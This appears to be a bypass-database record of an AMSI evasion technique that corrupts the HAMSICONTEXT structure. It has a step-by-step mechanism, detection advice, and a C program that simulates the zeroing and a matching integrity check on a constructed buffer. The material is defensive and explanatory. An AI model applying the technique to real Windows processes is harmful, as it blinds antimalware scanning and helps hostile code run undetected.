Bypass Record

AMSI Bypass × Microsoft AMSI

A publicly reported instance of the AMSI Bypass technique used against Microsoft AMSI, recorded with its original source. Factual record; no assessment of any specific deployment.

Product
Microsoft AMSI
Technique
AMSI Bypass
MITRE ATT&CK
T1562.001
Confidence
High
Severity
High
Status
poc
Disclosed
2026-01-10
Config / version noted
Not stated

Provenance

Reported as

bypassing the Antimalware Scan Interface (AMSI) by corrupting the HAMSICONTEXT structure

Mechanism

The code walks the process heap for the UTF-16 string 'DotNet', the application name the .NET runtime passes to AmsiInitialize, and from that string locates the adjacent HAMSICONTEXT pointer. It then corrupts the HAMSICONTEXT by zeroing the memory region. Because AmsiScanBuffer validates the context it is handed before scanning, every subsequent scan through that context fails and the content is never inspected, which leaves in-memory .NET assembly loads undetected. No memory-protection change is needed: the heap is already writable from inside the process.

Detection & mitigation

The cited source recommends monitoring for suspicious heap manipulation via API calls such as NtProtectVirtualMemory or WriteProcessMemory targeting AMSI-related structures, deploying AMSI provider integrity checks or kernel callbacks to detect tampering, enabling Windows Defender Application Control (WDAC), and using endpoint detection that flags anomalous memory writes to security-critical heaps. One caveat for practitioners: because the heap is already readable and writable, an in-process zeroing of HAMSICONTEXT calls neither NtProtectVirtualMemory nor WriteProcessMemory, so telemetry keyed on those APIs only catches variants that tamper from another process or rewrite a protected page. Checks that do not depend on those calls, such as verifying the context's signature and pointers before use, or noting a process that loads managed assemblies while producing no AMSI scan telemetry, are more robust against this variant.
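The following is an added example, not code from the cited source or from amsi.dll: a self-contained model of both the corruption described under Mechanism and the context integrity check suggested under Detection & mitigation. The HAMSICONTEXT layout used here (a 'AMSI' signature, a pointer to the UTF-16 appName, an IAntimalware pointer and a session count) is the commonly reverse-engineered one and is an assumption, as is the modelled AmsiScanBuffer behaviour of rejecting a context with a bad signature with E_INVALIDARG. The "heap" is a constructed byte buffer so the program runs on any platform; the function names are the example's own.

```c
/* Added example: model of HAMSICONTEXT corruption and the matching
 * integrity check.  The struct layout and the E_INVALIDARG behaviour are
 * assumptions (undocumented structure, modelled not copied); the heap is a
 * constructed buffer, not a real Windows process heap. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define AMSI_SIGNATURE 0x49534D41u   /* bytes "AMSI", little-endian */
#define S_OK           0x00000000u
#define E_INVALIDARG   0x80070057u

/* Assumed HAMSICONTEXT layout: signature, UTF-16 app name,
 * IAntimalware pointer, open-session count. */
typedef struct {
    uint32_t        signature;
    const uint16_t *app_name;
    void           *antimalware;
    uint32_t        session_count;
} amsi_context_t;

#define HEAP_SIZE 512
static uint8_t g_heap[HEAP_SIZE];                 /* constructed stand-in for the process heap */
static const uint16_t DOTNET[] = { 'D','o','t','N','e','t', 0 };   /* UTF-16 "DotNet" */
static int g_dummy_provider;                      /* stands in for the IAntimalware object */

/* Lay out a "DotNet" string and a context referencing it, as AmsiInitialize
 * would, at fixed offsets inside the constructed heap. */
static void build_sample_heap(void) {
    memset(g_heap, 0xCC, HEAP_SIZE);                 /* filler bytes */
    memcpy(g_heap + 64, DOTNET, sizeof DOTNET);       /* the appName string */
    amsi_context_t ctx = {
        .signature     = AMSI_SIGNATURE,
        .app_name      = (const uint16_t *)(g_heap + 64),
        .antimalware   = &g_dummy_provider,
        .session_count = 1,
    };
    memcpy(g_heap + 256, &ctx, sizeof ctx);          /* the HAMSICONTEXT */
}

/* Step 1 of the technique: find the UTF-16 "DotNet" string in the heap. */
static long find_dotnet_string(const uint8_t *heap, size_t len) {
    for (size_t off = 0; off + sizeof DOTNET <= len; off += 2)
        if (memcmp(heap + off, DOTNET, sizeof DOTNET) == 0) return (long)off;
    return -1;
}

/* Step 2: find the context whose appName pointer refers to that string and
 * whose signature is still 'AMSI'.  Returns the context offset or -1. */
static long find_amsi_context(const uint8_t *heap, size_t len) {
    long s = find_dotnet_string(heap, len);
    if (s < 0) return -1;
    const uint16_t *target = (const uint16_t *)(heap + s);
    for (size_t off = 0; off + sizeof(amsi_context_t) <= len; off += sizeof(void *)) {
        amsi_context_t c;
        memcpy(&c, heap + off, sizeof c);            /* memcpy: no alignment assumptions */
        if (c.signature == AMSI_SIGNATURE && c.app_name == target) return (long)off;
    }
    return -1;
}

/* Step 3: the corruption itself, zeroing the structure in place.  No
 * protection change or cross-process write is involved. */
static void corrupt_amsi_context(uint8_t *heap, long off) {
    memset(heap + off, 0, sizeof(amsi_context_t));
}

/* Modelled AmsiScanBuffer entry check: a context whose signature is not
 * 'AMSI' (or whose pointers are null) is rejected with E_INVALIDARG and
 * nothing is scanned. */
static uint32_t simulated_amsi_scan(const uint8_t *heap, long off) {
    amsi_context_t c;
    memcpy(&c, heap + off, sizeof c);
    if (c.signature != AMSI_SIGNATURE || c.app_name == NULL || c.antimalware == NULL)
        return E_INVALIDARG;
    return S_OK;
}

/* Defender-side integrity check: is the context at a known offset intact? */
static int amsi_context_intact(const uint8_t *heap, long off) {
    return simulated_amsi_scan(heap, off) == S_OK;
}

int main(void) {
    build_sample_heap();
    long off = find_amsi_context(g_heap, HEAP_SIZE);
    printf("context at offset %ld, scan result 0x%08x\n", off, simulated_amsi_scan(g_heap, off));
    corrupt_amsi_context(g_heap, off);
    printf("after corruption: scan result 0x%08x, intact=%d\n",
           simulated_amsi_scan(g_heap, off), amsi_context_intact(g_heap, off));
    return 0;
}
```

The point the model makes concrete is that the appName string survives the attack untouched while the context that references it does not: a scanner that only looks for the 'DotNet' string finds nothing amiss, whereas a check that re-validates the context (signature present, pointers non-null) fails the moment the zeroing lands, without relying on any memory-protection or cross-process API call having fired.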

This is a record of a publicly-reported event, not an assessment of any specific organization's deployment. Detection and mitigation notes are drawn from the cited source. Where the source is silent, fields are omitted.